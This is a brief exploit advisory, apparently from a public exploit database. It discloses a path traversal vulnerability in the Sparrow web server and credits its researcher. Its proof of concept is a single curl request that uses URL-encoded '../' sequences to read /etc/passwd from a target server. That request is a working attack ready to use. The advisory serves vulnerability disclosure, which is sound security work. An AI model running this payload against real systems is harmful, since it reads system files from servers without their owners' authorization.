# Title: Sparrow Web Server - Path Traversal
# Author: Nassim Asrir
# Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Researcher At: Henceforth
# CVE: N/A

# Vendor #:

https://github.com/codercheng/sparrow

# Download #:

https://github.com/codercheng/sparrow

# Vulnerability Type#:

Path Traversal

# Exploit type #

Local - Remote

# POC #:

To exploit this vulnerability use Curl libray:

$ curl http://server-ip/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd